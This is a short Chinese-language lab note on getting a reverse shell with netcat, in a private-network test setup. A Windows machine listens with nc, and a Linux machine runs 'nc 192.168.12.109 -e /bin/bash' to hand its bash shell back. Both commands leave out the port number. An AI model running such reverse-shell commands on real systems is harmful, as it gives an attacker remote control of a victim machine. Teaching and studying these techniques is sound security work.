- 原理
- 实验环境:
攻击机:windows机器,IP:192.168.12.109
受害机:linux机器,IP:192.168.79.1
- 攻击机:设置本地监听端口2222
C:\netcat>nc -l -p
- 受害机:反弹/bin/bash 到攻击机(192.168.12.109)的2222端口
root@bt:~# nc 192.168.12.109 -e /bin/bash
反弹shell成功后即可在windows的cmd.exe下执行Linux下的/bin/bash的命令了。
注意事项:处于安全角度考虑,nc的-e选项有的操作系统不存在,该实验利用BackTrack 5 R3下的nc -e选项。